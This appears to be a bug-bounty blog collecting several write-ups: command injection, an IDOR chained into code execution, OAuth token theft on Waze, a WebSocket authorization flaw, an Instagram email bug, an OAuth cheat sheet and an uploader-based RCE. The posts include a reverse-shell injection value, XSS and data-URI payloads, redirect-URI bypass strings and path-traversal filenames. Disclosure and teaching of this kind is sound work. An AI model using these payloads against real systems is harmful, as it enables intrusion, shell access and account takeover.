Private Program – Backtracking logs for Command Injection.

Hey guys, Today I want to share one of my Command Injection finding in a private program, If you haven’t read my earlier post of Code Execution you will need to read it first as it will make you familiar with the kind of web app am hunting here.

What? Go read it first

So let’s start,  Now as I said in earlier post I was going through logs of this web app 2Gb 10 files ¯\_(ツ)_/¯, One line caught my attention;


/opt/xx/local/phantomjs/bin/phantomjs --ignore-ssl-errors=yes /opt/xx/resources/tav_test.js 'https://localhost:8080/ki/?&type=tav&org_id=0&org_name=your+organization&report=abc&from=now-1d&to=now#/greport/iocmatches.rpt?from=now-1d&to=now' iocmatches.rpt /opt/xx/var/reports/3a71d03e9d584bd092968bc96dcb5f720_2017_07_02_10_58_00_002040.pdf

So the web app was executing phantom js on a URL, What caught my eyes was org_name parameter has this value your+organisation which means it may contain our input in the command. So first step was to finding from which section of the web app this command was executing and see what inputs we control, Looking at report under this URL I found out that it was running a feature called generate report which generates a pdf report,  Now lets have a look at the parameters;

{"parameter":"report_iocmatches_weekly.rpt","parameter2":"test","parameter3":"* * * * *","parameter4":{"to":"now/d","from":"now/d","mode":"quick"},"enabled":true,"created_ts":"2017-09-17T16:47:48Z","parameter5":"blah.rpt","modified_ts":"2017-09-17T16:47:48Z","parameter6":"3a71d03e9d584bd092968bc96dcb5f720","parameter7":"test","$$hashKey":"032"}

No org_name 🙁 But wait “parameter6” value reflects there let’s try this so I passed

"parameter6":"3a71d03e9d584bd092968bc96dcb5f720 | bash -i >& /dev/tcp/server/port 0>&1 |"

And Bhoom!

Now, this was simple, But getting through that 2 gb of logs wasn’t easy especially when they were split in part of files :'( I found this command going in 7th part.

I learned one more thing always test parameters by fuzzing different things, You don’t know what developers doing with your input ¯\_(ツ)_/¯ . Now if you are a good reader you must have noticed this request may be prone to many other issues and one is quite awesome I would write about those soon (Some of you may have already guessed that 😉 ) That’s all for now. I will also soon write about Backtracking their OAuth endpoints for account takeover 🙂

Thanks : Prince Chaddha

Thanks for reading!

Harsh from Bugdiscloseguys!

Getting started with Bug Bounty.

Hey, guys! This post is dedicated to all those who want to do bug bounty. Although I am not a ranker like my friends Sandeep, Osama, Parth, Arbaz, etc I learned many things throughout my way in bug bounty and I want to share them in this post 🙂

 

What should you know before getting into bug bounty? 

  • First of all, you should know basic things about web app(ofc. bug bounties are not limited to it) have what is HTTP? What is HTML? What are HTML Forms? What is JavaScript? What does JS do? Structure of a web app(Nowadays all web apps have MVC). IMO this thing matter. A book like Web Hacking 101 will help a lot.
  • Keep learning new things, How?  HackerOne’s Hactivity (Web Hacking 101 also covers this section), Other Hunters blog, And just dig in whenever you see weird term or thing, Maybe you end up learning a good thing?
  • Play with Burp, Explore it 😉

Approaching a target

  • If you’re new don’t just focus on reward only sites, go for points in this way you will learn by hunting and gaining some rep. points also.
  • Don’t change your target frequently, Give at least 2-3 days if you’re new to hunting it won’t be easy for you to find your first bug in minutes or hours.
  • Before hunting for bugs, Explore the web app see what type of app it is, Get some idea of its basic. I always checkout API Docs which gives me a quick overview of web app.
  • If you think that a part of site should have something or something can be bypassed, Dig in it, Don’t give up, Just a few days back Osama and I was hunting an endpoint and he ended up bypassing a fix, I gave up but he didn’t ;).
  • Try to bypass their filters,waf most of the time there will be a bypass for their filters,waf a quick example;

Recently I came across a target there was a WAF (sitewide) which prevents user to input any input which contains JS Event, Such as onmouseover, onload etc I tried on%0Bload but it was getting reflected as %0B itself, So I tested their API to create a post bIt I was doing it with API Console which had WAF so I manually made a request to api.target.com with my payload as content of post and boom it executed 🙂 This way I managed to get more XSS in it 😀

  • Don’t be lazy, In above example Manual request bypassed it but not the API console cause API Console was hosted at target.com/api/console which had WAF.

That’s all for now but there will be a second part of this part i will share some more fun things in it.

If you liked it do share 🙂

Thanks for reading.
Harsh from Bugdiscloseguys!

 

 

 

Private Program – Code Execution.

As the program is private; Program Name, Endpoints are replaced **
Hey guys, Today i’ll show you how i gained a Code Execution on a HackerOne’s Private Program. This is chaining of multiple issues, which were addressed separately and all were marked as Critical/P1. Nice team 😀
This  program had a ABC Enterprise installation and a Normal Installation which have some less features or say some less endpoints 😉 , Program hosted Enterprise for testers with admin credentials given. While Normal was available to download and host locally.
Normal Installation
  • Less features,
  • Less bounty,
  • Gives basic idea how the app is hosted and working on backend. 🙂
Information i gained using Normal Installation
  • Some internal services.
  • Web app structure.
Some XSS, SSRF were found in Normal Installation, But now i had an understanding of what i’m testing.
Lets go ahead and start with program hosted Enterprise with many more features / endpoints

1 – Critical IDOR

There was option to download logs, After downloading logs i started looking into it what things it contains. And luckily i found a request in logs
GET /api/v1/upload?username=xxx&api_key=xxx&dcid=xxx&timestamp=xxx
where other  users  api_key was getting leaked, Hmm this is good but we’re working as Admin login right now, So i tired download the log while being normal user & unauthenticated and it got downloaded. Using this IDOR an attacker can download logs while being unauth to instance and then further exploit it with api_key retrieved from logs. So now i can report this one but i decided to dig in it further.
After making request to;
GET /api/v1/upload?username=xxx&api_key=xxx&dcid=ggg&timestamp=123
I got another URL in response which was;
Tried changing filename for LFD but didn’t worked, changed upload to download still no LFD, Seems like dead end :/ But then i thought lets make an OPTIONS request (read in someone’s write up)
And GET, PUT was there, Made PUT request and server responded with ‘Content Length can’t be 0’, added raw data and again made request and response was 200 OK, Then i added ../../../../../../../../tmp/harsh.txt in filename and again response 200 OK
Then, ../../../../../../../../etc/harsh.txt and exception 😀
Permission Denied (/opt/xxx/api/uploads/../../../../../../../../etc/harsh.txt)
^ Not exactly this.
At this point i have enough things to report
  • Unauthenticated user can download logs
  • Logs contains API Key
  • Using API Key attacker can create files on server (where current user had permission).
And plot twist;
  • Api key was password of admin user itself.

All reported and got response from team.

Code Execution with Server Admin Interaction

So after reporting all the above mentioned issues, I challenged myself to use this endpoint separately and get Code Execution.
And within few minutes i realized a normal user credentials also accepted at /api/v1/upload and hence a normal user can create files on server.
Going back to logs and Normal Installation for gaining info how this issue can get me a Code Execution.
Realized the web app is started from /opt/xxx/bin/xlink, So this was simple all an attacker need to do is overwrite xlink with reverse shell script, and wait server admin to restart (just make some files not usable which will force admin to restart) the server by doing sh xlink restart/stop/start and as soon as he trigger this condition we will have a rev shell.
This issue was Normal user to Code Execution.  Traiged and Rewarded as Crtical.
Now this 2 bugs finished here. You might have noticed i mentioned “sh xlink restart/stop/start ” as the file is not executable. Will continue later with another RCE 😉 which wont require attacker to wait for admin to restart the server. 😛 Instead all an attacker need to do is visit a url and enjoy shell although this one will require attacker to have admin access of web app.
Thanks for reading.
Harsh from Bugdiscloseguys!

Google VRP : oAuth token stealing.

Hey guys! hope you all doing well :), In June/July i decided to hunt on Google Products, As Google have almost everything in scope so i gone though list of Google products/fully integrated acquisitions. ( https://www.google.com/intl/en/about/products/ ), Waze is one of Google’s Fully integrated acquisitions (There’s difference b/w integrated and non-integrated). So i decided to give it a try 🙂

I was looking at Waze iOS app and there was an option to login with Twitter, Show i started capturing requests, The URL was like this;

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxxxx

(not exactly this, feeling lazy to checkout again :P)

The flow works in same manner like `Authorization Code flow` as Twitter don’t have `Implicit flow` (as far as i know)

1 – GET Request to http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx

2 – 302 Response to https://api.twitter.com/oauth/authorize?oauth_token=xxxxx&redirect_uri=http://www.waze.com/SocialMediaServer/redirect?redirect=http://somdomain.waze.com%3Fsession_cookies=xxxx&server=this

session_cookies=xxxx%26oauth_token%3D=xxx%26oauth_verifier=xxxxx

Luckily yes it was vulnerable to open redirect we won the battle already 😀 but wait we’re working with twitter `oauth_veriifier` which is not very usable from attacker perspective. Also twitter requires us to authorize app everytime :/

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx looking at ‘id’ , seems some more social connect possible, so i checked out android app as well and found facebook, linkedin are also there. Started testing on android, the flow for Facebook was completely different here. I started fuzzing around the old url, tried to replace Twitter to Facebook.

GET Request – http://www.waze.com/SocialMediaServer/social/connect?id=facebook&session_cookies=xxx

Response – 500 Error 🙁

But wait i seen many apps working in this pattern /social/*connection_name*/connect , Lets give it a try.

GET – http://www.waze.com/SocialMediaServer/social/facebook/connect?id=twitter&session_cookies=xxx

Response -302 :DDDDD,

Changed ?redirect=http://harshjaiswal.com  and response_type=token,signed_request

Final PoC :

https://m.facebook.com/v2.8/dialog/oauth?auth_type=rerequest&client_id=343050668156&default_audience=friends&redirect_uri=https://waze.com/SocialMediaServer/redirect?redirect=http://harshjaiswal.com&response_type=token,signed_request&return_scopes=true&scope=email,user_friends,user_events

Response –

http://harshjaiswal.com/?redirect=http://harshjaiswal.com#granted_scopes=user_events%2Cuser_friends%2Cemail%2Cpublish_actions%2Cpublic_profile&denied_scopes=&signed_request=XXXXXXX&access_token=EAAAATXXXXX&expires_in=688

Although this was a fully integrated acq. i got less bounty 😛 as they still consider it as acquition FOR bounty purposes 🙁

But its okay! atleast i learned one thing, If they don’t give you endpoint, try to guess it 3:)

I hope you like it. 🙂

Hunting Websockets For Fun And Profit


It’s been a while since we have came up with any blogpost. 
So this post will be about how i grabbed every information that was being updated over my organization even after i was removed from the organization.
First let’s start with what is WebSockets?
A good explanation can be found here https://pusher.com/websockets
Lets start, As the program is private i cannot share it so i’ll be naming it as victim.com and subdomain of the organization as abc.victim.com.
So while doing my normal testing i noticed that while changing any info on abc.victim.com a request is made to WebSockets with the details of the like for example in my case:
https://api.victim.com/ws?account_id=660681&access_token=1055279.rJBikWGAfRCTgrK8xhXeoF7hR5j-kB4SriC3jZOqZH_JapsE2vZ206qKVsS5qPqNntpsBh-nBCDmzQuuepCxKw

 Response for the above WebSocket connection was:

{"action":"update","acting_user_id":null,"object":{"user_connection":{"id":63184,"person_id":175308,"last_active_at":"2016-08-22T06:06:02.651Z"}}}

Apparently after watching the response i though what would happen if the user is removed from the organization would he still able to fetch the data from the organization.
Now the question was what and what not can be extracted from the WebSockets?
The first thing i noticed that the user after getting kicked from the organization is still able to extract/grab every details of changes happening in the organization by connecting to the WebSocket request which we captured earlier.
Example of the response after the user was removed from the organization.
RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.603Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205693,"first_name":"owner","last_name":"owner","email":"myemailhere@gmail.com","login":"enabled","admin":true,"archived":false,"subscribed":true,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:17:20.656Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.000Z"}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:35.489Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1000,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":2,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:11.285Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205695,"first_name":"aman","last_name":"dhaker","email":"testmymailforxss@gmail.com","login":"disabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:20:54.998Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"person":{"id":205695,"first_name":"owner","last_name":"owner","email":"testmymailforxss@gmail.com","login":"enabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim-files.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:21:26.586Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"create","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:36.192Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:57.285Z"}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205696,"first_name":"aman","last_name":"dhaker","email":"","login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:22:06.751Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":3,"interval":"monthly","card":null,"address":null,"discount":null}}}

I was able to extract details the user email, project details , customer details and contacts 
The good thing i noticed was that i was able to extract those details even when i was on view only permission.
Thanks For Reading.
Cheers
Bugdiscloseguys

Instagram Email Verification Issue

Hey guys! So won’t be taking too long, its an year old bug i found in Instagram thought to share, The bug was very simple so not going too write much just simple PoC :).

Steps to reproduce :

1) Create an account on instagram with email “abc@x.com”

2) Login to account and change Email to “def@x.com”

3) Click on the Verification link sent to “def@x.com” this will change email of account to the old email which is “abc@x.com”

Which seems an coding misconfiguration what should happen that after click the confirm link email should change to “def@x.com”

Attack Scenario : 

1) Attacker compromised user Email account “abc@x.com”

2) User came to know about email account compromise.

3) User change his/her instagram email to his /her new email def@x.con

4) User click on the link received at “def@x.com”
but this changes email back to “abc@x.com” ( User dont know about this cause no notification at verify page )

5) User think he/she changed the email and he/she is safe now

5) Attacker request for reset password link of instagram account cause he compromised the old account already and compromise the instagram account.

Video PoC https://drive.google.com/file/d/0Bx2_guht6dHMeVN1UEtOSEY0N2M/view

P.S : Please ignore the video, i used to hunt on father’s pc those days :p 

Timeline :
22 Feb 2016 – Initial Report sent to Facebook.
03 March 2016 – Facebook Confirmed and Fixed the issue.
22 March 2016 – 2000$ Rewarded .

🙂 Started Facebook Bug Bounty again, hope i found something 🙂 

Cheatsheet : Open Authentication – oAuth

Hey guys! I hope you all doing well, So today we’re going to discuss about oAuth and its bad implantation 🙂

– What is oAuth ?

– IOAuth 2 is an authorization framework that enables applications to obtain limited access to user accounts on an HTTP service, such as Facebook, GitHub, and DigitalOcean. It works by delegating user authentication to the service that hosts the user account, and authorizing third-party applications to access the user account. OAuth 2 provides authorization flows for web and desktop applications, and mobile devices.

Visit https://www.digitalocean.com/community/tutorials/an-introduction-to-oauth-2 (a must read) and learn oauth working before starting testing in it 🙂 


What’re the common bugs left in oAuth implantation ?

– XSS
– Redirect URL bypass
– CSRF
– ClickJacking 

1 – XSS 

It is possible to get both reflective and stored XSS using oAuth in developers portal of your target 🙂
lets discuss how it is possible, Sometimes the value for “redirect url” is filtered for http(s) links only and hence you fail to add javascript:alert(10) in redirect url but this can be bypassed if it is not properly validating .

Payload : javascript://https://attacker.com/?z=%0Aalert(1)

Description :
As mention in previous post;
javascript:                        – Javascript’s pseduo protocol/schema
//                                       – Begins a single line comment in js
https://google.com/?aaaa – comment itself
%0a                                  – Intiate a new line which ends the single line comment
alert(1)                             – a valid javascript’s predefined function

Now this can trick the url validation and accepts this value in redirect url, now you can use

https://app.target.com/v1/oauth/authorize?response_type=code&client_id=xxxxxx-xxxxx
&redirect_uri=javascript://https://attacker.com/?z=%0Aalert(1)&scope=read write&state=kkkk

And bhoom XSS’ed after client app grant access, but wait what more malicious you can do here is stealing the access token given by Authorization Server. 🙂

There is another way for XSS is using, data uri
You can give a try to : data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= in redirect url value 🙂 it may work too.

http://www.paulosyibelo.com/2016/08/instagram-stored-oauth-xss.html (His blog is awesome 😉 )

2 – Redirect URL bypass

Now this one is really vast,  what if you can bypass the redirect url set by developer ? that would be awesome cause you can again steal access token 😉

http://example.com is set by developer then you can bypass it if the oauth implantation is not configured well from bypasses,
some of the good bypasses are following

Source : http://nbsriharsha.blogspot.in/2016/04/oauth-20-redirection-bypass-cheat-sheet.html

  • http://example.com%2f%2f.victim.com
  • http://example.com%5c%5c.victim.com
  • http://example.com%3F.victim.com
  • http://example.com%23.victim.com
  • http://victim.com:80%40example.com
  • http://victim.com%2eexample.com

Must read : http://www.nirgoldshlager.com/2013/02/how-i-hacked-facebook-oauth-to-get-full.html (Awesome)

Another must read : http://www.nirgoldshlager.com/2013/03/how-i-hacked-any-facebook-accountagain.html (Mind blown)

3 – CSRF 

Client app approval page where you grant access to a client app sometimes vulnerable to CSRF which can be used by attacker to force victim to approve attackers app with some dangereous scope access.

3 – ClickJacking 

Client app approval page where you grant access to a client app sometimes vulnerable to ClickJacking which can be used by attacker to trick victim to approve attackers app with some dangereous scope access. Recently my 2 bugs got validated same like this 😉 

This are just some common issues there are many issues left in oauth implantation find out them 😀 and make money 😉 


Pwn them for Learn


Hello guys! This days i’m not much active because of college life 🙁 but this weekend i got enough time to write about one of my Finding on a
private site 🙂 from which i was able to get a Remote code execution on the server 🙂 

Site : B*******.com
Description : Bitcoin sell and buy site 
Bug : Remote Code Execution

Ok lets start! first of all the site login system was fully different they send you “Access Code”(An 7 digit code) on the registered email whenever u want to login and it was working on Cloudflare. 

Playing around uploader : 

After login there was a page to upload documents which includes ID proof upload which have unrestricted file upload but whenever i upload php and open it, it was getting downloaded, then i started messing around uploader and giving some unsuitable characters given me server error which leaked server full path, upload script path, and server type (nginx).




Lets Read some files : 

The thing i noticed is anyfile.js was script and node-modules and things like was there (Zero knowledge in node.js) two thing was confirmed  Ngnix – Node.js, but why php wasn’t executing cause HTML was executed which means stored XSS but i was looking for RCE, now one thing i was missing that nginx some times have problem with uploader so i did ../../a.php in filename which uploaded the  a.php in root directory of site, but it was still not executing :/ means php was not configured on nodejs, as i said anyfile.js and its path was there in debug message so i opened it and i was fully shocked :O it was node.js file with Mysql login(root user 😀 ), SMTP mail login(gmail, the same email which sends “Access code” which means we do account takeover from here) and publicly accessible 😉



Lets shell :

Doing some more work i was able to read many files which means i got Arbitary source code read, now as i said cloudflare, Real IP was not available to me, so i started getting its IP which landed me to Email headers which leaked me Server IP, ok but the mysql port 3306 was closed(may be its only up on 127.0.0.1 not on 0.0.0.0) (the same port was configured in anyfile.js) so i started finding another port on the same ip which given me 2 ports, ip:7788 and ip:8899, ip:8899 was clone of site, while ip:7788 have api documentations so by doing some work on ip:7788 one i got its full path which was /home/*user*/php/application/file.php 😀  damn php was configured here now i gone back to port 8899 which was clone of site and used ../../../user/php/a.php and checked it on ip:7788/a.php and bhoom php executed 😀 



./My reaction : Lets get into it xD but as Whitehat i can’t, it will violate program’s policy



./Root cause : 
Uploader miss configured in 2 ways -> allowed php and directory change (most probably cause of nginx) — — — Eq. 1 
Leak of full path of a server which had php installed. — — — Eq. 2

By Combining Eq1 and Eq2 ; Eq1 + Eq2 = RCE

./Game Over
./Bounty awarded
./Special Thanks to Waleed, Rahul Maini, Daniel;